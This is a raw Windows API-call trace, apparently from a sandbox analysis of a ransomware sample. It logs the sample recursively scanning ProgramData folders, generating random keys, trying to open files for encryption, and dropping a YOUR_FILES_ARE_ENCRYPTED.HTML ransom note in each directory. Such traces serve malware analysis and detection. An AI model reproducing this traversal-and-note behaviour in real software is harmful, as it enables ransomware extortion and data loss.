[0106.173] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0106.174] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0106.174] GetProcessHeap () returned 0x600000 [0106.174] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0106.174] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0106.175] WriteFile (in: hFile=0x304, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.177] CloseHandle (hObject=0x304) returned 1 [0106.177] GetProcessHeap () returned 0x600000 [0106.178] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0106.178] GetProcessHeap () returned 0x600000 [0106.178] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0106.178] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 1 [0106.178] StrStrIW (lpFirst="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.178] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 87 [0106.178] GetProcessHeap () returned 0x600000 [0106.178] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0106.180] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" [0106.180] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*" [0106.180] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636452, dwReserved1=0x6363f0, cFileName=".", cAlternateFileName="")) returned 0x626978 [0106.180] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636452, dwReserved1=0x6363f0, cFileName="..", cAlternateFileName="")) returned 1 [0106.180] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x636452, dwReserved1=0x6363f0, cFileName="background.png", cAlternateFileName="")) returned 1 [0106.180] StrStrIW (lpFirst="background.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.180] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned 102 [0106.180] PathFindExtensionW (pszPath="background.png") returned=".png" [0106.180] lstrlenW (lpString=".png") returned 4 [0106.180] PathFindExtensionW (pszPath="background.png") returned=".png" [0106.180] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.180] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.180] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6cf, dwReserved0=0x636452, dwReserved1=0x6363f0, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0106.180] StrStrIW (lpFirst="behavior.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.180] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned 100 [0106.181] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0106.181] lstrlenW (lpString=".xml") returned 4 [0106.181] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0106.181] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.181] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.181] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x636452, dwReserved1=0x6363f0, cFileName="watermark.png", cAlternateFileName="")) returned 1 [0106.181] StrStrIW (lpFirst="watermark.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.181] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned 101 [0106.181] PathFindExtensionW (pszPath="watermark.png") returned=".png" [0106.181] lstrlenW (lpString=".png") returned 4 [0106.181] PathFindExtensionW (pszPath="watermark.png") returned=".png" [0106.181] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.181] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.181] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x636452, dwReserved1=0x6363f0, cFileName="watermark.png", cAlternateFileName="")) returned 0 [0106.181] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0106.181] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0106.181] GetProcessHeap () returned 0x600000 [0106.181] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0106.182] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0106.184] WriteFile (in: hFile=0x304, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.185] CloseHandle (hObject=0x304) returned 1 [0106.185] GetProcessHeap () returned 0x600000 [0106.185] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0106.185] GetProcessHeap () returned 0x600000 [0106.185] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0106.186] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 0 [0106.186] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0106.186] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0106.186] GetProcessHeap () returned 0x600000 [0106.186] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.187] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.189] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.190] CloseHandle (hObject=0x314) returned 1 [0106.191] GetProcessHeap () returned 0x600000 [0106.191] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.191] GetProcessHeap () returned 0x600000 [0106.191] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.192] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Task", cAlternateFileName="")) returned 1 [0106.192] StrStrIW (lpFirst="Task", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.192] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task") returned 46 [0106.192] GetProcessHeap () returned 0x600000 [0106.192] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.193] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task" [0106.194] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*" [0106.194] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x626978 [0106.194] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0106.194] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", cAlternateFileName="{07DEB~1")) returned 1 [0106.194] StrStrIW (lpFirst="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.194] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 85 [0106.194] GetProcessHeap () returned 0x600000 [0106.194] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0106.195] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0106.195] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*" [0106.195] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0106.196] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="..", cAlternateFileName="")) returned 1 [0106.197] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="en-US", cAlternateFileName="")) returned 1 [0106.197] StrStrIW (lpFirst="en-US", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.197] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned 91 [0106.197] GetProcessHeap () returned 0x600000 [0106.197] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0106.198] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" [0106.198] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*" [0106.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6363f8, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0106.199] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6363f8, cFileName="..", cAlternateFileName="")) returned 1 [0106.200] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9eb0c2e2, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9eb0c2e2, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9eb0c2e2, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x63d090, dwReserved1=0x6363f8, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0106.200] StrStrIW (lpFirst="resource.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.200] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml") returned 104 [0106.200] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0106.200] lstrlenW (lpString=".xml") returned 4 [0106.200] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0106.200] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0106.200] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.200] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9eb0c2e2, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9eb0c2e2, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9eb0c2e2, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x63d090, dwReserved1=0x6363f8, cFileName="resource.xml", cAlternateFileName="")) returned 0 [0106.200] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0106.201] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0106.201] GetProcessHeap () returned 0x600000 [0106.201] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d57c8 [0106.201] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0106.201] WriteFile (in: hFile=0x32c, lpBuffer=0x6d57c8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d57c8*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 